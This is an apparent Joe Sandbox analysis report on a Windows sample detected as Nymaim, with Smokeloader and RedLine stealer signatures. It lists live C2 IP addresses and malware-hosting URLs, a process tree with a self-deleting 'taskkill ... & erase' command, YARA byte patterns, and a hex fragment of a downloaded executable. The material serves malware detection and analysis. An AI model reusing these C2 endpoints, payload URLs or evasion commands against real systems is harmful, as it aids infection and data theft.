Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:	file.exe
Analysis ID:	715158
MD5:	526fde9e61b1b4835885973331fa1616
SHA1:	ebbb0c3586b8a0244585eacb44ca125ac933ad8e
SHA256:	093741e4079a8092ba9d94653cb4f11c15fbe1e9ef53690e91628c61f0cc9440
Tags:	exe
Infos:

Detection

Nymaim

Score:	96
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Nymaim

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Binary is likely a compiled AutoIt script file

Machine Learning detection for sample

May check the online IP address of the machine

C2 URLs / IPs found in malware configuration

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

One or more processes crash

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Found dropped PE file which has not been started or loaded

PE file contains executable resources (Code or Archives)

IP address seen in connection with other malware

Downloads executable code via HTTP

Enables debug privileges

Drops files with a non-matching file extension (content does not match file extension)

Sample file is different than original file name gathered from version info

Drops PE files

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Binary contains a suspicious time stamp

Uses taskkill to terminate processes

Creates a process in suspended mode (likely to inject code)

Classification

×

Process Tree

System is w10x64

file.exe (PID: 6136 cmdline: C:\Users\user\Desktop\file.exe MD5: 526FDE9E61B1B4835885973331FA1616)

WerFault.exe (PID: 6120 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 532 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 3016 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4728 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 700 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4156 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 720 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 2140 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 776 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 4708 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 868 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 5928 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 880 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 1680 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 976 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

WerFault.exe (PID: 1324 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1268 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 5144 cmdline: C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 5112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Cleaner.exe (PID: 4628 cmdline: "C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe" MD5: 04514BD4962F7D60679434E0EBE49184)

WerFault.exe (PID: 5216 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6136 -s 1556 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)

cmd.exe (PID: 6044 cmdline: "C:\Windows\System32\cmd.exe" /c taskkill /im "file.exe" /f & erase "C:\Users\user\Desktop\file.exe" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

taskkill.exe (PID: 6080 cmdline: taskkill /im "file.exe" /f MD5: 15E2E0ACD891510C6268CB8899F2A1A1)

cleanup

Malware Configuration

Threatname: Nymaim

{"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x1028:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 60 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.file.exe.21d0e67.30.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.18.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.13.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.7.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.23.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.5.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.4.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.21.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.19.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.11.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.31.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.file.exe.2210000.0.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.26.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.9.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.16.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.25.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.8.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.30.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.24.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.1.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.28.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.17.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.14.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.6.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.3.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.31.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.26.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.7.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.1.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.11.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.21.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.24.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.32.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.15.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.14.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.10.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.2.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.13.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.4.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.10.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.27.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.32.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.5.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.29.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.8.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.29.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.28.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.6.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.20.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.18.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.20.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.12.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.22.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.19.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.22.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.3.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.25.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.2.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.9.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.15.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.17.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.3.file.exe.2210000.0.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.27.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.12.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.400000.23.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
0.0.file.exe.21d0e67.16.raw.unpack	JoeSecurity_Nymaim	Yara detected Nymaim	Joe Security
Click to see the 62 entries

Sigma Signatures

⊘No Sigma rule has matched

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 47%

Antivirus detection for URL or domain

Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&subst	URL Reputation: Label: malware
Source: http://171.22.30.106/library.php	URL Reputation: Label: malware
Source: http://208.67.104.97/powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinteIN	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\soft[1]	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe	ReversingLabs: Detection: 28%

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp

Malware Configuration Extractor: Nymaim {"C2 addresses": ["208.67.104.97", "85.31.46.167"]}

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.6:49712 version: TLS 1.2

Source:	Binary string: ^\C:\car.pdb source: file.exe
Source:	Binary string: C:\car.pdb source: file.exe

Networking

May check the online IP address of the machine

Source: C:\Users\user\AppData\Local\Temp\gVbgwXdNtgMn\Cleaner.exe

DNS query: name: iplogger.org

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 208.67.104.97
Source: Malware configuration extractor	IPs: 85.31.46.167

Source: Joe Sandbox View

ASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83
Source: Joe Sandbox View	IP Address: 148.251.234.83 148.251.234.83

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 Oct 2022 15:42:20 GMTServer: Apache/2.4.41 (Ubuntu)Pragma: publicExpires: 0Cache-Control: must-revalidate, post-check=0, pre-check=0Cache-Control: privateContent-Disposition: attachment; filename="dll";Content-Transfer-Encoding: binaryContent-Length: 242176Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 a6 03 00 00 20 00 00 00 a8 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 10 04 00 00 00 e0 03 00 00 06 00 00 00 aa 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 04 00 00 02 00 00 00 b0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 c6 03 00 00 00 00 00 48 00 00 00 02 00 05 00 a0 60 02 00 34 65 01 00 01 00 00 00 00 00 00 00 90 55 01 